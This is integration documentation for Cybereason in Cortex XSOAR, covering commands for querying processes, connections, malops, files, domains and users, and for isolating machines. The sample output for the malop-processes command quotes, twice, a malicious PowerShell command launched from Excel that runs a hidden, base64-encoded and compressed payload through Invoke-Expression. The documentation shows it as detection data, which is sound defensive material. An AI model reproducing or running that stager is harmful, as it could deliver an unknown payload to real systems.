Cybereason
Cybereason Pack.#
This Integration is part of theCybereason is an endpoint detection and response platform used through Cortex XSOAR to manage and query malops, connections, and processes.
This integration was integrated and tested with Cybereason v17.5.20.
Important Notes
- The integration supports both basic and client-certification authentications.
-
Decrypt certificate
.pfx
file outside of Cortex XSOAR. - If you plan to fetch incidents, read the important notes in the Fetched Incidents Data section.
-
Insert the decrypted certificate in the
Certificate
field under the Credentials tab, according to the following template.
Bag Attributes <ATTRIBUTES> -----BEGIN CERTIFICATE----- <CERTIFICATE> -----END CERTIFICATE----- -----BEGIN RSA PRIVATE KEY----- <KEY> -----END RSA PRIVATE KEY-----
Configure Cybereason on Cortex XSOAR
- Navigate to Settings > Integrations > Servers & Services .
- Search for Cybereason.
-
Click
Add instance
to create and configure a new integration instance.
- Name : a textual name for the integration instance.
- Server URL (e.g. https://192.168.0.1 )
- Credentials
- Trust any certificate (not secure)
- Use system proxy settings
- Fetch incidents
- Incident type
- Click Test to validate the URLs, token, and connection.
Fetched Incidents Data
Cortex XSOAR fetches the first batch of Cybereason malops from the previous three days.
After the first batch of fetched malops, Cortex XSOAR fetches new Cybereason malops as soon as they are generated in Cybereason.
IMPORTANT : In order to properly fetch incidents, you need to create a pre-process rule for each incident type. The rule should include the SourceBrand - Cybereason and the incident Type (Malware, Phishing, etc.) Choose Run a script for the action, and choose the CybereasonPreProcessing script.
Pre-Process Rule for Malware Indicator Type
Integration Instance Configuration
Commands
You can execute these commands from the Cortex XSOAR CLI, as part of an automation, or in a playbook. After you successfully execute a command, a DBot message appears in the War Room with the command details.
- Search for processes: cybereason-query-processes
- Check connection to Cybereason server: cybereason-is-probe-connected
- Search for connections: cybereason-query-connections
- Isolate a machine from the network: cybereason-isolate-machine
- Take machine out of isolation: cybereason-unisolate-machine
- Get a list and details for all malops: cybereason-query-malops
- Get a list of all malops: cybereason-malop-processes
- Add a comment to a malop: cybereason-add-comment
- Update malop status: cybereason-update-malop-status
- Prevent a malop process file: cybereason-prevent-file
- Allow a malop process file: cybereason-unprevent-file
- Get information for a file: cybereason-query-file
- Get information for a domain: cybereason-query-domain
- Get information for a user: cybereason-query-user
1. Search for processes
Searches for processes with various filters.
Base Command
cybereason-query-processes
Input
Argument Name | Description | Required |
---|---|---|
machine | Machine hostname | Optional |
onlySuspicious | Show only suspicious processes | Optional |
limit | Maximum number of results to retrieve | Optional |
processName | Process name to filter by | Optional |
saveToContext | If true, save the result to the context | Optional |
hasIncomingConnection | Filter only processes with incoming connections | Optional |
hasOutgoingConnection | Filter only processes with outgoing connections | Optional |
Context Output
Path | Description |
---|---|
Process.Name | The process name |
Process.Malicious | Malicious status of the process |
Process.CreationTime | Process creation time |
Process.EndTime | Process end time |
Process.CommandLine | Command line of the process |
Process.SignedAndVerified | Is the process signed and verified |
Process.ProductType | Product type |
Process.Children | Children of the process |
Process.Parent | Parent process |
Process.OwnerMachine | Machine hostname |
Process.User | The user who ran the process |
Process.ImageFile | Image file of the process |
Process.SHA1 | SHA-1 of the process file |
Process.MD5 | MD5 of the process file |
Process.CompanyName | Company name |
Process.ProductName | Product name |
Command Example
!cybereason-query-processes machine=DESKTOP-VUO0QPN hasOutgoingConnection=true hasIncomingConnection=true
Context Example
{ "Process": [ { "CommandLine": "C:\\Windows\\system32\\svchost.exe -k LocalService", "CompanyName": "Microsoft Corporation", "CreationTime": "2018-08-06T23:46:30", "EndTime": "2018-08-06T23:45:11", "ImageFile": "svchost.exe", "MD5": "32569e403279b3fd2edb7ebd036273fa", "Malicious": "indifferent", "Name": "svchost.exe", "OwnerMachine": "DESKTOP-VUO0QPN", "Parent": "services.exe", "ProductName": "Microsoft® Windows® Operating System", "ProductType": "SVCHOST", "SHA1": "660b76b6fb802417d513adc967c5caf77fc2bac6", "SignedandVerified": "true", "User": "desktop-vuo0qpn\\local service" } ] }
Human Readable Output
Cybereason Processes
Name | Malicious | Creation Time | End Time | Command Line | Signed and Verified | Product Type | Children | Parent | Owner Machine | User | Image File | SHA1 | MD5 | Company Name | Product Name |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
svchost.exe | indifferent | 2018-08-06T23:46:30 | 2018-08-06T23:45:11 | C:\Windows\system32\svchost.exe -k LocalService | true | SVCHOST | services.exe | DESKTOP-VUO0QPN | desktop-vuo0qpn\local service | svchost.exe | 660b76b6fb802417d513adc967c5caf77fc2bac6 | 32569e403279b3fd2edb7ebd036273fa | Microsoft Corporation | Microsoft® Windows® Operating System |
2. Check connection to Cybereason server
Checks if the machine is currently connected to the Cybereason server.
Base Command
cybereason-is-probe-connected
Input
Argument Name | Description | Required |
---|---|---|
machine | Hostname of the machine to check | Required |
Context Output
Path | Type | Description |
---|---|---|
Cybereason.Machine.isConnected | boolean | true if machine is connected, false if machine is not connected |
Cybereason.Machine.Name | string | Machine name |
Command Example
!cybereason-is-probe-connected machine=DESKTOP-VUO0QPN
Context Example
{ "Cybereason": { "Machine": "Name": "DESKTOP-VUO0QPN", "isConnected": true } } }
Human Readable Output
true
3. Search for connections
Searches for connections.
Base Command
cybereason-query-connections
Input
Argument Name | Description | Required |
---|---|---|
ip | Filter connections that contain this IP (in or out) | Optional |
machine | Filter connections on the specified machine | Optional |
saveToContext | If true , save the result to the context | Optional |
Context Output
Path | Description |
---|---|
Connection.Name | Connection name |
Connection.Direction | OUTGOING/INCOMING |
Connection.ServerAddress | Address of the Cybereason machine |
Connection.ServerPort | Port of the Cybereason machine |
Connection.PortType | Connection type |
Connection.ReceivedBytes | Received bytes count |
Connection.TransmittedBytes | Transmitted bytes count |
Connection.RemoteCountry | Connection's remote country |
Connection.OwnerMachine | Machine hostname |
Connection.OwnerProcess | The process that performed the connection |
Connection.CreationTime | Connection creation time |
Connection.EndTime | Connection end time |
Command Example
!cybereason-query-connections ip=192.168.39.128
Context Example
{ "Connection": [ { "CreationTime": "2018-04-30T18:12:28", "Direction": "OUTGOING", "Name": "172.16.3.7:48300 \u003e 54.235.96.83:8443", "OwnerMachine": "ip-172-16-3-7.ec2.internal", "OwnerProcess": "cybereason-sens", "RemoteCountry": "United States", "ServerAddress": "54.235.96.83", "ServerPort": "8443" } ] }
Human Readable Output
Cybereason Connections
Name | Direction | Server Address | Server Port | Port Type | Received Bytes | Transmitted Bytes | Remote Country | Owner Machine | Owner Process | Creation Time | End Time |
---|---|---|---|---|---|---|---|---|---|---|---|
172.16.3.7:48300 > 54.235.96.83:8443 | OUTGOING | 54.235.96.83 | 8443 | United States | ip-172-16-3-7.ec2.internal | cybereason-sens | 2018-04-30T18:12:28 |
4. Isolate machine from the network
Isolates a machine that has been infected from the rest of the network
Base Command
cybereason-isolate-machine
Input
Argument Name | Description | Required |
---|---|---|
machine | Machine name to be isolated | Required |
Context Output
Path | Type | Description |
---|---|---|
Cybereason.Machine | string | Machine name |
Cybereason.IsIsolated | boolean | Is the machine isolated |
Endpoint.Hostname | string | Machine name |
Command Example
!cybereason-isolate-machine machine=DESKTOP-VUO0QPN
Context Example
{ "Cybereason": { "IsIsolated": true, "Machine": "DESKTOP-VUO0QPN" }, "Endpoint": { "Hostname": "DESKTOP-VUO0QPN" } }
Human Readable Output
Machine was isolated successfully.
5. Take machine out of isolation
Returns a machine that was isolated from the network.
Base Command
cybereason-unisolate-machine
Input
Argument Name | Description | Required |
---|---|---|
machine | Name of machine to take out of isolation | Required |
Context Output
Path | Type | Description |
---|---|---|
Cybereason.Machine | string | Machine name |
Cybereason.IsIsolated | boolean | Is the machine isolated |
Endpoint.Hostname | string | Machine name |
Command Example
!cybereason-unisolate-machine machine=DESKTOP-VUO0QPN raw-response=true
Context Example
{ "Cybereason": { "IsIsolated": false, "Machine": "DESKTOP-VUO0QPN" }, "Endpoint": { "Hostname": "DESKTOP-VUO0QPN" } }
Human Readable Output
Machine was un-isolated successfully.
6. Get a list and details for all malops
Returns a list and details of all malops.
Base Command
cybereason-query-malops
Input
Argument Name | Description | Required |
---|---|---|
filters | The filters to filter the response by (given in Cybereason API syntax) | Optional |
totalResultLimit | The total number of results to return for your server. To reduce system overload and maximize server performance, make sure the limit is a reasonable number. | Optional |
perGroupLimit | The number of items to return for each malop group | Optional |
templateContext |
The level of detail to provide in the response. Possible values include:
|
Optional |
withinLastDays | Return all the malops within the last days | Optional |
Context Output
Path | Type | Description |
---|---|---|
Cybereason.Malops.GUID | string | Malop GUID |
Cybereason.Malops.CreationTime | string | The time reported as when the malicious behavior began on the system. This is not the time the malop was first detected by Cybereason. |
Cybereason.Malops.DecisionFeature | string | The reason that Cybereason raised the malop |
Cybereason.Malops.Link | string | Link to the malop on Cybereason |
Cybereason.Malops.Suspects | string | Malop suspect type and name |
Cybereason.Malops.LastUpdatedTime | string | Last updated time of malop |
Cybereason.Malops.AffectedMachine | string | List of machines affected by this malop |
Cybereason.Malops.InvolvedHash | string | List of file hashes involved in this malop |
Command Example
!cybereason-query-malops
Context Example
{ "Cybereason": { "Malops" : [ { "CreationTime": "2018-04-30T14:05:14", "DecisionFailure": "maliciousExecutionOfPowerShell", "GUID": "11.8371241992421952627", "LastUpdateTime": "2018-04-30T14:07:29", "Link": "https://integration.cybereason.net:8443/#/malop/11.8371241992421952627", "Suspects": "Process: powershell.exe" } ] } }
Human Readable Output
Cybereason Malops
GUID | Link | CreationTime | LastUpdateTime | DecisionFailure | Suspects |
---|---|---|---|---|---|
11.8371241992421952627 | https://integration.cybereason.net:8443/#/malop/11.8371241992421952627 | 2018-04-30T14:05:14 | 2018-04-30T14:07:29 | maliciousExecutionOfPowerShell | Process: powershell.exe |
7. Get a list of all malops
Returns a list of malops.
Base Command
cybereason-malop-processes
Input
Argument Name | Description | Required |
---|---|---|
malopGuids |
Array of malop GUIDs (comma-separated). Retrieve the Malop GUID using the
cybereason-query-malops
.
|
Required |
machinename | A CSV list of machine names affected by malops, for example, "machine1,machine2" | Optional |
Context Output
Path | Type | Description |
---|---|---|
Process.Name | string | Process name |
Process.Malicious | unknown | Malicious status of the process |
Process.CreationTime | date | Process creation time |
Process.EndTime | date | Process end time |
Process.CommandLine | string | The command line of the process |
Process.SignedAndVerified | unknown | Is the process signed and verified |
Process.ProductType | unknown | Product type |
Process.Children | unknown | Children of the process |
Process.Parent | unknown | Parent process |
Process.OwnerMachine | unknown | Machine hostname |
Process.User | string | The user who ran the process |
Process.ImageFile | unknown | Image file of the process |
Process.SHA1 | string | SHA-1 of the process file |
Process.MD5 | string | MD5 of the process file |
Process.CompanyName | string | Company name |
Process.ProductName | string | Product name |
Command Example
!cybereason-malop-processes malopGuids=11.8371241992421952627
Context Example
{ "Process": [ { "CommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('nVRtc9o4EP7Or9jx6GbsCVbMS2mCJzOl0LTcFZoLtOkdw9wIW2AXWXJkGUwo//3W4CP0632xvNLuPs+unhV5hjt4Z9VmAyGGSaq0sa0115KLVpOGQljOHNJ8IeIAMsMMLrwweA5DaR6Mhm+xNjkTPSFUYFd7Iu2FoeZZVoc8lgbC7SR+4ZWxPPliKiWnu/R1+0ErwwPj+P+bS19zZvg0wiV85XKye8boeJEbfkHKsGB9YnZ2xj1tzuzP2w9Ms4Qj1jn4iIUl3Au2uvQ8oQ1DLMN6VzN6tychdtjqve8PPtx//DT8/Y/Po/GXhz8fJ9Ov356+//U3WwQhX66i+MdaJFKlzzoz+WZb7F68RrPVftN5e3Nr0anqR0z3tGY726ktcxmU6BDYZOPsQXOTYx9se4bsZvM5kM2vEfATRpxluebul8UPbDO4kzxxKH7gN/CKhueBy5/htukcXrMb2JNlyd7yG5S2fi4VFhdErjqmwLOrOyDhzF5x42omQ5WAm7AiTjArCelnLlcmcuYHv+JHlv5Fdg57SLUKsNWwn7GS6JwUCIefKyD/HHzgMkQKBbLPUA0VLuxtybf/GY9HXIdK1ILtHA4XAKs9IGOwSXzn+SQGVxjotPHv6srZkwiRjE/WJWCICNwHqArEEAEx8l2jX1Y6RCUj4UO8BBt7njkOnLuOHghbGdbt5vtXC8skCcaNkWfV78kuMzyhY27oE1/0Rcwloif0E8qF64yi6Gwrz7h22QqPrDpYI/USC8Gu29RDVJWkqLiFQJ6jyfADdGjDh6cYq99mMJ46llMjEjFXPsze7ww/yiAtySd0oLZSKBYOmGG2FRmTdq+vG7dN2ujcUI82vJtuu926JtICzKIwCOm45XjihfJkwfWAL2MZH9tKnsEd4ziAheitpgWuRCtLWcDhuHNfXUAGbsqyzEQ6r5Hijqhu95fnwquTtBJJ3Stanufh0vYcf1Y16zGXJk44xeniWqUTrjcxyoWOmM4iJubdbl+lO5ukdfDqMDsN4dwmBYofjVbTdpw6nEHK0jDk8pVAxDop6uXilUOicuPKXOBNH18CdyI4T3FWeKBQijedtucd8O0Kov3hXw==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"", "CompanyName": "Microsoft Corporation", "CreationTime": "2018-04-30T14:05:49", "EndTime": "2018-04-30T14:06:22", "ImageFile": "powershell.exe", "MD5": "92f44e405db16ac55d97e3bfe3b132fa", "Malicious": "indifferent", "Name": "powershell.exe", "OwnerMachine": "ROBERTE-EXCASST", "Parent": "excel.exe", "ProductName": "Microsoft® Windows® Operating System", "SHA1": "04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d", "User": "darkcap\\roberte" } ] }
Human Readable Output
Cybereason Malop Processes
Name | Malicious | Creation Time | End Time | Command Line | Parent | Owner Machine | User | Image File | SHA1 | MD5 | Company Name | Product Name |
---|---|---|---|---|---|---|---|---|---|---|---|---|
powershell.exe | indifferent | 2018-04-30T14:05:49 | 2018-04-30T14:06:22 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('nVRtc9o4EP7Or9jx6GbsCVbMS2mCJzOl0LTcFZoLtOkdw9wIW2AXWXJkGUwo//3W4CP0632xvNLuPs+unhV5hjt4Z9VmAyGGSaq0sa0115KLVpOGQljOHNJ8IeIAMsMMLrwweA5DaR6Mhm+xNjkTPSFUYFd7Iu2FoeZZVoc8lgbC7SR+4ZWxPPliKiWnu/R1+0ErwwPj+P+bS19zZvg0wiV85XKye8boeJEbfkHKsGB9YnZ2xj1tzuzP2w9Ms4Qj1jn4iIUl3Au2uvQ8oQ1DLMN6VzN6tychdtjqve8PPtx//DT8/Y/Po/GXhz8fJ9Ov356+//U3WwQhX66i+MdaJFKlzzoz+WZb7F68RrPVftN5e3Nr0anqR0z3tGY726ktcxmU6BDYZOPsQXOTYx9se4bsZvM5kM2vEfATRpxluebul8UPbDO4kzxxKH7gN/CKhueBy5/htukcXrMb2JNlyd7yG5S2fi4VFhdErjqmwLOrOyDhzF5x42omQ5WAm7AiTjArCelnLlcmcuYHv+JHlv5Fdg57SLUKsNWwn7GS6JwUCIefKyD/HHzgMkQKBbLPUA0VLuxtybf/GY9HXIdK1ILtHA4XAKs9IGOwSXzn+SQGVxjotPHv6srZkwiRjE/WJWCICNwHqArEEAEx8l2jX1Y6RCUj4UO8BBt7njkOnLuOHghbGdbt5vtXC8skCcaNkWfV78kuMzyhY27oE1/0Rcwloif0E8qF64yi6Gwrz7h22QqPrDpYI/USC8Gu29RDVJWkqLiFQJ6jyfADdGjDh6cYq99mMJ46llMjEjFXPsze7ww/yiAtySd0oLZSKBYOmGG2FRmTdq+vG7dN2ujcUI82vJtuu926JtICzKIwCOm45XjihfJkwfWAL2MZH9tKnsEd4ziAheitpgWuRCtLWcDhuHNfXUAGbsqyzEQ6r5Hijqhu95fnwquTtBJJ3Stanufh0vYcf1Y16zGXJk44xeniWqUTrjcxyoWOmM4iJubdbl+lO5ukdfDqMDsN4dwmBYofjVbTdpw6nEHK0jDk8pVAxDop6uXilUOicuPKXOBNH18CdyI4T3FWeKBQijedtucd8O0Kov3hXw==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" | excel.exe | ROBERTE-EXCASST | darkcap\roberte | powershell.exe | 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d | 92f44e405db16ac55d97e3bfe3b132fa | Microsoft Corporation | Microsoft® Windows® Operating System |
8. Add a comment to a malop
Adds a new comment to a malop.
Base Command
cybereason-add-comment
Input
Argument Name | Description | Required |
---|---|---|
comment | Comment to add to the malop. | Required |
malopGuid |
GUID of the malop to add the comment to. Retrieve the Malop GUID using the
cybereason-query-malops
.
|
Required |
Context Output
There is no context output for this command.
Command Example
!cybereason-add-comment comment=NewComment malopGuid=11.8371241992421952627
Human Readable Output
Comment added successfully
9. Update malop status
Updates a malop status.
Base Command
cybereason-update-malop-status
Input
Argument Name | Description | Required |
---|---|---|
malopGuid | GUID of the malop to update the status of | Required |
status | Status to update | Required |
Context Output
Path | Type | Description |
---|---|---|
Cybereason.Malops.GUID | string | Malop GUID |
Cybereason.Malops.Status | string |
Malop status:
|
Command Example
!cybereason-update-malop-status malopGuid=11.8371241992421952627 status="To Review"
Context Example
{ "Cybereason": { "Malops": "GUID": "11.8371241992421952627", "Status": "To Review" } } }
Human Readable Output
Successfully updated malop 11.8371241992421952627 to status To Review
10. Prevent a malop process file
Prevent malop process file from running on the machine.
Base Command
cybereason-prevent-file
Input
Argument Name | Description | Required |
---|---|---|
hash | MD5 of the malop process file to prevent | Required |
Context Output
Path | Type | Description |
---|---|---|
Process.MD5 | string | Process file MD5 |
Process.Prevent | boolean | True if process file is prevented |
Command Example
!cybereason-prevent-file hash=6fb065fcff8d92da51bba667dc9f770c
Context Example
{ "Process": { "MD5": "6fb065fcff8d92da51bba667dc9f770c", "Prevent": true } }
Human Readable Output
File was prevented successfully.
11. Allow a malop process file
Allow a malop process file to run on the machine.
Base Command
cybereason-unprevent-file
Input
Argument Name | Description | Required |
---|---|---|
hash | MD5 of the malop process file to allow | Required |
Context Output
Path | Type | Description |
---|---|---|
Process.MD5 | string | Process file MD5 |
Process.Prevent | boolean | True if process file is prevented |
Command Example
!cybereason-unprevent-file hash=6fb065fcff8d92da51bba667dc9f770c
Context Example
{ "Process": { "MD5": "6fb065fcff8d92da51bba667dc9f770c", "Prevent": false } }
Human Readable Output
File was unprevented successfully.
12. Get information for a file
Query files as part of investigation.
Base Command
cybereason-query-file
Input
Argument Name | Description | Required |
---|---|---|
file_hash | File hash (SHA-1 and MD5 supported) | Required |
Context Output
Path | Type | Description |
---|---|---|
Cybereason.File.Path | string | File path |
Cybereason.File.SHA1 | string | File SHA-1 hash |
Cybereason.File.Machine | string | Machine name on which file is located |
Cybereason.File.SuspicionsCount | number | File suspicions count |
Cybereason.File.Name | string | File name |
Cybereason.File.CreationTime | date | File creation time |
Cybereason.File.Suspicion | string | File suspicions object of suspicion as key and detected date as value |
Cybereason.File.OSVersion | string | Machine OS version on which the file is located |
Cybereason.File.ModifiedTime | date | File modified date |
Cybereason.File.Malicious | boolean | Is file malicious |
Cybereason.File.Company | string | Company name |
Cybereason.File.MD5 | string | File MD5 hash |
Cybereason.File.IsConnected | boolean | Is machine connected to Cybereason |
Cybereason.File.Signed | boolean | Is file signed |
Cybereason.File.Evidence | string | File evidences |
Endpoint.Hostname | string | Hostname on which file is located |
Endpoint.OSVersion | string | Machine OS version on which the file is located |
File.Hostname | string | Hostname on which file is located |
File.MD5 | string | File MD5 hash |
File.SHA1 | string | File SHA-1 hash |
File.Name | string | File name |
File.Path | string | File path |
Command Example
!cybereason-query-file file_hash=d40a48094c1f21fef892f27a8b6a7ed2bbf0c27f
Context Example
{ "Cybereason": { "File": [ { "Company": "company", "CreationTime": "2018-09-25T20:10:38.000Z", "Evidence": [ "mimikatzResourceEvidence", "reportedByAntiMalwareEvidence", "malwareClassificationEvidence", "hasLegitClassificationEvidence", "hasNonLegitClassificationEvidence", "whitelistClassificationEvidence" ], "IsConnected": false, "MD5": "b5962945811f8d275a3a69334dbc81e8", "Machine": "DESKTOP-UNQ8LCD", "Malicious": false, "ModifiedTime": "2018-11-14T20:02:34.000Z", "Name": "mimikatz.exe", "OSVersion": "Windows_10", "Path": "c:\\users\\user\\downloads\\mimikatz_trunk\\x64\\mimikatz.exe", "SHA1": "d40a48094c1f21fef892f27a8b6a7ed2bbf0c27f", "Signed": true, "Suspicion": { "fileReputationSuspicion": "2018-11-14T20:02:52.000Z", "mimikatzSuspicion": "2018-11-14T20:02:52.000Z", "reportedByAntiMalwareSuspicion": "2018-11-27T20:56:54.000Z" }, "SuspicionsCount": 3 } ] }, "Endpoint": [ { "Hostname": "DESKTOP-UNQ8LCD", "OSVersion": "Windows_10" } ], "File": [ { "Hostname": "DESKTOP-UNQ8LCD", "MD5": "b5962945811f8d275a3a69334dbc81e8", "Name": "mimikatz.exe", "Path": "c:\\users\\user\\downloads\\mimikatz_trunk\\x64\\mimikatz.exe", "SHA1": "d40a48094c1f21fef892f27a8b6a7ed2bbf0c27f" } ] }
Human Readable Output
13. Get information for a domain
Query domains as part of investigation.
Base Command
cybereason-query-domain
Input
Argument Name | Description | Required |
---|---|---|
domain | Domain to query | Required |
Context Output
Path | Type | Description |
---|---|---|
Cybereason.Domain.Name | string | Domain name |
Cybereason.Domain.Malicious | boolean | Is domain malicious |
Cybereason.Domain.IsInternalDomain | boolean | Is domain internal |
Cybereason.Domain.Reputation | string | Domain reputation |
Cybereason.Domain.SuspicionsCount | number | Domain suspicions count |
Cybereason.Domain.WasEverResolved | boolean | Was domain ever resolved |
Cybereason.Domain.WasEverResolvedAsASecondLevelDomain | boolean | Was domain ever resolved as a second-level domain |
Domain.Name | string | Domain name |
Command Example
!cybereason-query-domain domain=www2.bing.com
Context Example
{ "Cybereason": { "Domain": [ { "IsInternalDomain": false, "Malicious": false, "Name": "www2.bing.com", "Reputation": "indifferent", "SuspicionsCount": 0, "WasEverResolved": true, "WasEverResolvedAsASecondLevelDomain": true } ], "Domain": [ { "Name": "www2.bing.com" } ] } }
Human Readable Output
14. Get information for a user
Query users as part of investigation.
Base Command
cybereason-query-user
Input
Argument Name | Description | Required |
---|---|---|
username | Username to query | Required |
Context Output
Path | Type | Description |
---|---|---|
Cybereason.User.Username | string | User name |
Cybereason.User.Domain | string | User domain |
Cybereason.User.LastMachineLoggedInTo | string | Last machine the user logged in to |
Cybereason.User.LocalSystem | boolean | Is local system |
Cybereason.User.Organization | string | User organization |
Command Example
!cybereason-query-user username="ec2amaz-5man2hc\\network service"
Context Example
{ "Cybereason": { "User": [ { "Domain": "ec2amaz-5man2hc", "LastMachineLoggedInTo": "EC2AMAZ-5MAN2HC", "LocalSystem": true, "Organization": "INTEGRATION", "Username": "ec2amaz-5man2hc\\network service" } ] } }